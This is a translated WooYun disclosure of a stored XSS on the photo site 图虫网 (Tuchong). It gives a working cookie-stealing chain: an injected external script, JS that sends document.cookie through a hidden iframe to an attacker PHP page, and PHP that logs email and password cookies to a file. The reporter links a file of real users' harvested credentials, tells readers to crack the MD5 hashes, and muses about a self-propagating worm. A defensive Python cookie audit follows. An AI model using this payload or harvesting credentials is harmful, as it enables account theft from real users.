Vulnerability summary

Defect ID: wooyun-2012-011372

Title: 图虫网 (Tuchong) account password leak, high risk.

Vendor: 图虫网

Author: _Evil

Submitted: 2012-08-26 16:00

Fix time: 2012-08-31 16:00

Published: 2012-08-31 16:00

Vulnerability type: XSS cross-site scripting

Severity: High

Self-assessed Rank: 20

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2012-08-26: Details sent to the vendor, awaiting vendor handling
2012-08-31: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Honestly, I really wanted to use Ajax to keep it spreading, 1 infecting 10, 10 infecting 100. Without authorization I didn't dare.

剑心 (Jianxin): a vulnerability has to be backed up with data.

Detailed description:

http://yf-吗晒客.com/uploads/sb.txt


The passwords are MD5 hashes; just reverse them.

Proof of vulnerability:

<html>
<head><title>90sec</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
body{
background-image:url(http://forum.90sec.org/images/default/logo.gif);
background-attachment:fixed;
background-repeat:no-repeat;
background-color:#AFAFAF;
background-position:50% 50%;
}
</style>
</head>
<body>
</body>
</html>
<?php
$cookie = $_GET['c'];
get_pwd_and_email($cookie);
function get_pwd_and_email($cookie)
{ $get = array();
if (!empty($cookie))
{
$cookie = strtr($cookie,"; ","&");
parse_str($cookie,$get);
if(isset($get['email'])) $a=$get['email'];
if(isset($get['password'])) $b=$get['password'];
$c="email:$a-password:$b";
//echo "$c";
$password_list=file('E:/vhost/wwwroot/vhost1329816067000/www/uploads/sb.txt');
if(in_array("$c\r\n",$password_list))
{break;}else{
$fp=@fopen('E:/vhost/wwwroot/vhost1329816067000/www/uploads/sb.txt','a');
@fwrite($fp,$c."\r\n");
@fclose($fp);
}
}
}
?>


Exploited via an externally loaded JS file:

<script/src=//xxxxx/1.js>


Contents of 1.js:

<iframe id="rc" width="0" height="0"></iframe><script>document.getElementById("rc").src="http://xxx/SBzhu1.php?c="+document.cookie;</script>


Thanks to 90sec core member L.N for helping optimize the PHP code. The testing was not malicious; please don't take offense.

Fix recommendation:

http://www.wooyun.org/corps/%E5%9B%BE%E8%99%AB%E7%BD%91 Go look at the vulnerability I sent you and fix it properly. Sigh......
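The root cause the proof above relies on is that the site keeps the user's e-mail address and MD5 password hash in cookies that page scripts can read, so a single XSS hands them to whoever injects the script. The following is an added example, not code from the report or from 图虫网: a Python check that audits Set-Cookie headers for credential-shaped values and for missing HttpOnly/Secure/SameSite flags. The header strings are constructed samples modelled on the cookie layout the report harvested, and the check assumes Python 3.8 or later (for SameSite support in http.cookies).

```python
import re
from http.cookies import SimpleCookie

# Patterns for the two value shapes seen in the harvested cookies:
# a plain e-mail address and a bare 32-hex (unsalted MD5) password digest.
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
MD5_RE = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)
CREDENTIAL_NAMES = {"email", "password", "passwd", "pwd", "pass"}


def audit_set_cookie(header):
    """Return a list of findings for one Set-Cookie header value (empty = clean)."""
    jar = SimpleCookie()
    jar.load(header)  # parses "name=value; Path=/; HttpOnly; ..." (Python 3.8+ for SameSite)
    findings = []
    for name, morsel in jar.items():
        value = morsel.value
        if name.lower() in CREDENTIAL_NAMES:
            findings.append(f"{name}: credential-bearing cookie name")
        if EMAIL_RE.match(value):
            findings.append(f"{name}: value is an e-mail address")
        if MD5_RE.match(value):
            findings.append(f"{name}: value looks like an unsalted MD5 digest")
        # Morsel flag attributes are "" when absent and True when present.
        if not morsel["httponly"]:
            findings.append(f"{name}: missing HttpOnly (readable via document.cookie)")
        if not morsel["secure"]:
            findings.append(f"{name}: missing Secure")
        if not morsel["samesite"]:
            findings.append(f"{name}: missing SameSite")
    return findings


# Constructed sample headers: the first two mirror the cookie layout the report
# harvested (email and password hash as separate, script-readable cookies); the
# third is the hardened form, an opaque session id carrying all three flags.
SAMPLE_HEADERS = [
    "email=alice@example.com; Path=/",
    "password=00112233445566778899aabbccddeeff; Path=/",
    "session=c0ffee00cafe; Path=/; HttpOnly; Secure; SameSite=Lax",
]


def audit_all(headers=SAMPLE_HEADERS):
    """Map each header to its findings, keeping only headers that have any."""
    return {h: audit_set_cookie(h) for h in headers if audit_set_cookie(h)}


if __name__ == "__main__":
    for header, findings in audit_all().items():
        print(header)
        for finding in findings:
            print("  -", finding)
```

Run it against the Set-Cookie headers a login response actually emits; anything credential-shaped should move server-side behind an opaque, HttpOnly session identifier rather than gain flags.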

Copyright notice: please credit the source when reposting: _Evil@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2012-08-31 16:00

Vendor reply:

Latest status:

2012-09-01: I didn't receive the e-mail before.